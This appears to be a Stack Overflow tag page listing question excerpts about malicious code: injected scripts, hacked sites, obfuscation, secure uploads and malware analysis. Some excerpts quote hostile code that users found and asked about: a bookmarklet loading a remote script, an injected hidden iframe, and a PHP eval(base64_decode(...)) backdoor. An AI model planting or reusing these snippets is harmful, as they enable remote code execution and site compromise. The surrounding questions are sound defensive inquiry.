The malicious tag has no wiki summary.
-1
votes
1answer
50 views
I found malicious code on my site… but can't figure out how it got there [closed]
Every other article I have looked at with this problem mentions WordPress or Joomla.
My site uses neither, it's just a template with basic HTML/CSS no Java. I am trying to find the vulnerability ...
0
votes
1answer
48 views
Need to find out how malicious Javascript was injected into my header.php Wordpress theme file
Unfortunately my site was blocked for containing Malicious Javascript by AVG and Google. The malicious code pasted below, was somehow injected into the header.php theme file on the latest version of ...
-1
votes
0answers
32 views
Google webmaster tools warns my site injected, but I can't find the inected code [closed]
My site is powered by Joomla 2.5.9. Google webmaster gives me a list of compromised URLs.
I have very little PHP and coding knowledge, though I still decided to try fixing it.
I start with one of the ...
0
votes
1answer
17 views
Secure html+php form to upload image and vector files?
I trying to do a form which accepts raster graphics and vector graphics files (it can be: jpg, gif, psd, png, svg, eps, ai, cdr, pdf and others) and I want to avoid malicious files.
The options I ...
0
votes
0answers
25 views
JavaScript Analyzer That would examine the javascript and identify it as malicious
I have made a web crawler using agility pack. What happens is that a give a url as input to my program it crawls through the links. My purpose is mainly to analyze the java script so that i can mark ...
0
votes
2answers
32 views
Virus in the server, and cannot download corrupt files, what do you suggest here? [closed]
I found that one of the sites I was working on is affected by a malicious code, which has affected quite a lot of other sites as well, mainly Joomla : http://evuln.com/labs/thenmotor.com/
I also ...
0
votes
1answer
77 views
how to print register value using rop (return oriented programming)?
I've got an assignment to build rop code thats calls printf with the value inside edx register.
I'm stuck. I know the address of printf function, and I have a tools to find gadgets.
I'm trying to ...
0
votes
1answer
71 views
Mono.Cecil - obfuscated malicious code
In this great article (http://eatplayhate.wordpress.com/2010/07/18/mono-cecil-vs-obfuscation-fight/) the author claims that Mono.Cecil It’s not perfect, but it translated a good 90% of the functions ...
1
vote
2answers
68 views
What does this javascript code do? Is it malicious? [closed]
Some one is asking me to execute the following in my browser:
javascript:(function(){document.body.appendChild(document.createElement('script')).src='http://xyz.com/new2.js';})();
When I downloaded ...
0
votes
2answers
102 views
Malicious JavaScript code
What exactly is this malicious javascript code doing?
(function () {
var qk = document.createElement('iframe');
qk.src = 'http://xxx.tld/wp-includes/dtd.php';
qk.style.position = ...
2
votes
1answer
493 views
Malicious javascript injected - What does it do? [closed]
One of our sites recently had their ftp account compromised and as a result an attacker injected the following javascript into their homepage html. I'm pretty good with javascript but I cant make ...
1
vote
0answers
63 views
Google found a 404 that doesn't exists - Spam?
Google webmaster tools is only showing one error on a new site i've just completed for a URL:
http://www.homespunholistics.com/park.js%22%3E
It says it's linked from the homepage ...
-1
votes
2answers
79 views
security - Protection against Screenshot Keyloggers [closed]
I was thinking of creating an on-screen keyboard to protect against keyloggers. The main problem is that I have found that there is a category of keloggers, called screenshot key loggers, which are ...
0
votes
0answers
17 views
Strange code on our site?
We found this strange code on our site:
if (isset($_POST['update'])) {eval(base64_decode($_POST['update'])); exit;}
Can anyone tell us what it is? It seems from what we've found it is likely ...
-2
votes
1answer
51 views
Rootkits to do “good”? [closed]
At the moment I am studying rootkits which are mainly synonymous with malicious software. I would like to now if anyone has examples of rootkits actually being used for "good" things?
0
votes
1answer
33 views
Is it possible to upload a file with malicious filename?
Is it possible to send a http upload request a file to a Apache or IIS that will have a fileName with "../" or ".." that wouldn't be rejected and would be passed to php or ASP.Net engine?
0
votes
1answer
94 views
how to add malicious features for classification in weka as a data set
I am doing a project on how to detect and classify malicious content using weka data mining tool.
I have developed an algorithm but the problem is I don't know how and where to add malicious features ...
9
votes
3answers
577 views
Prevent Malicious Requests - DOS Attacks
I'm developing an asp.net MVC web application and the client has request that we try our best to make it as resilient as possible to Denial of Service attacks. They are worried that the site may ...
0
votes
2answers
119 views
Apache: adding javascript code to <head> of my page automatically
I am using wamp server for my project, I ran into this weird thing : when I run my html file directly it shows no additional code but when I tried to run it using apache by keeping it in www root, it ...
0
votes
0answers
27 views
dangerous interrupts
Let's say we have a fictional operating system in the user mode. Whenever an interrupt or a trap occurs, the os would switch to the Kernel mode jumping to the address determined from the interrupt ...
0
votes
2answers
98 views
an unknown js file on my Web server [closed]
I'm new in managing Web server, I maintain the server and make sure the server works for other web programmer, I found a js file that maybe malicious, I check the web server log, the JS file is ...
0
votes
0answers
674 views
Malicious code B66E5856 [closed]
I've got shared hosting and I've found _i.php file in all directories (even those that are not active sites). The content of this file doesn't look any dangerous at first sight. It says just:
...
4
votes
3answers
197 views
Umbraco is magically reverting to “Looks like there's more work to do”
I have a client and he has reported that 5/6 times, the website has somehow returned to unpublished mode. We are unsure what could be causing it and generally it will happen when no one is working on ...
0
votes
3answers
123 views
Sanitize MySQL data in Ruby on Rails 2
am reading data from a user-supplied CSV file of unknown number of rows. I iterate through the rows and rather than individually insert each row individually into the database (potentially a ...
0
votes
0answers
37 views
Malicious script loading in my drupal site [closed]
The following script is loading in my website
This seem to create ad popups on hover of certain words in my website.
Is this a malicious script? How can i remove this?
When i search in google for ...
1
vote
1answer
153 views
Is “cgi.escape” necessary in a Python application?
Was looking over a developer's code. He did something that I have never seen before in a Python application. His background is in PHP and is just learning python, so I don't know if this is perhaps a ...
13
votes
4answers
421 views
How to protect myself from a gzip or bzip2 bomb?
This is related to the question about zip bombs, but having gzip or bzip2 compression in mind, e.g. a web service accepting .tar.gz files.
Python provides a handy tarfile module that is convenient to ...
0
votes
0answers
161 views
how can i Read the content of Malicious web site in asp.net that firewall or antivirus blocked it [closed]
In my research i need that read the content of malicious web site from a big benchmark and access the content of this malicious site and analyse it code, but antivirus and firewall blocked it so I can ...
6
votes
2answers
563 views
Can Someone Tell Me Why This Is malicious..?
A friend of mine's site was being listed as malicious, and we found some obfuscated code that had been injected into his index.php without him knowing. I deobfuscated the code down two levels and ...
0
votes
0answers
70 views
Stop malicious script redirecting my page. Redirecting to laptopsentryexplorer.pro
Is there a way to prevent malicious script that redirects one of my links to the site in the title. Or is firebug (or some other tool) able to stop execution if redirection occurs?
I cannot find ...
3
votes
1answer
76 views
URL fetch: prevent abuse, mailcious urls etc. in python/django
I'm building a webpage featuring a very much a-like the facebook wall/newsfeed. Registered users (or through Facebook-connect, google auth) can submit urls. At the moment, I'm taking these URLs and ...
0
votes
2answers
354 views
Site redirecting to a malicious website, already cleaned the code
I have a website which is infected by some malicious malware. In the beginning I could notice that there was some strange javascript code on the site pages so I delete it and everything was fine for a ...
0
votes
1answer
71 views
Whacky characters in Word file (Javascript?)
Has anyone ever seen this kind of gobbledy-gook show up in the middle of a file before? I have a Word file that won't open, and I'm wondering if this is the cause. My gut tells me that the author ...
0
votes
0answers
93 views
writing a benign virus code
I am intersted on writing a program (on c++\c#) whch alerts as much as possible antiviruses (i.e if i upload the exe file of the program to virustotal i will get good detection rate). i tried writing ...
1
vote
0answers
42 views
Suspicious string of numbers sent by user on web app
I have a web application and something odd has happened in the database.
I see that some user has sent a series of messages to another user with the following text:
...
0
votes
0answers
74 views
understanding obfuscated scripts and how to check code
There are a lot of plugins now using obfuscated code and asking for amazon s3 account and clickbank id's and paypal emails etc.
I recently had over 30 sites hacked do to malicious base 64 code.
I ...
0
votes
3answers
99 views
Could a malicious user abuse this?
I have a textbox on a page, like so:
<form action="verify.php" method="post">
<input type="text" width="30" name="securityCode"><br />
<input type="submit" value="Go" />
...
1
vote
2answers
94 views
Allow subscriber list registration but prevent scripts
Users on my site have a publicly-visible profile where they accept subscriptions via a simple HTML form. These subscriptions are merged into this user's email list.
Someone could write a script that ...
0
votes
2answers
42 views
Encryped Core file in website
I have a file called Core that is about 10 Mb. It is in the same directory that all the other main files of my website are in, such as Index.php. When I open it up, it looks encrypted. Can anyone tell ...
3
votes
1answer
2k views
How to remove .htaccess virus? [closed]
First time posting so bear with me please!
My friend's site has been hacked and the .htaccess file (which I really know nothing about) has been injected with a malicious redirect that forces search ...
0
votes
0answers
31 views
ADOBE CVE2010-2883 Decoding
I am having a problem decoding this JavaScript that is embedded into a malicious pdf. I am trying to reverse engineer but am only able to do the unescape and that is it. I have tried Malzilla, ...
0
votes
1answer
198 views
Malicious Scripts found in asp.net solution explorer at Runtime
I have found some unknown .php files in Soultion Explorer of asp.net website while running locally.
When ever i navigate between pages it id dynamically creating two files in the name of 1. eval code ...
-1
votes
1answer
89 views
Collection of malicious or obfuscated Javascript? [closed]
I'm working on an academic project involving analysing obfuscation, and I'd like to find a reasonably sizeable collection of Javascript code known (or at least suspected) to be obfuscated to work ...
1
vote
1answer
198 views
Rails 3 Tutorial Michael Hartl - Section 9.4.1 Revisiting attr_accessible - malicious PUT requests
I'm a Rails beginner and currently reading Michael Hartl's Rails 3 Tutorial and have a question that I'm really curious about:
In the context of creating an admin user and some other 99 normal users ...
0
votes
1answer
111 views
How can I search for malicious cron jobs?
I have an account at WebFaction, and multiple sites that have been hacked, now multiple times, over the past month. Most of these are WordPress installs.
Every time this happens I change all ...
1
vote
3answers
284 views
Mitigate xss attacks when building links
I posted this question a while back and it is working great for finding and 'linkifying' links from user generated posts.
Linkify Regex Function PHP Daring Fireball Method
<?php
if ...
1
vote
3answers
254 views
How do I remove DIV tags with style attributes from XML file?
I have a huge Wordpress XML export. Unfortunately, some bastard managed to inject code into the installation and injected DIVs into the content.
Now I want to clean that mess up. Here's what it looks ...
0
votes
4answers
267 views
Found this very strange PHP code in one of my class files. What is it?
I built a website for a client a while ago who has been having issues with it. After getting into the site files I found this at the top of one of the PHP classes:
http://pastebin.com/SwrA3vw2
I ...
1
vote
1answer
442 views
Prevent malicious flash ads in an iframe from redirecting users in the top location
My site is laid out like this:
{main page (iframe containing flash ad) }
Sometimes malicious flash ads load in the frame and redirect the user to a site of their choosing. I imagine they use the ...
2
votes
1answer
207 views
How to prevent malicious code from calling my javascript
I have this code inside a file located at http://example.com/analytics.js and referenced in the HMTL head.
The below code is kind of Javascript pseudo code to what I want to do
function ...



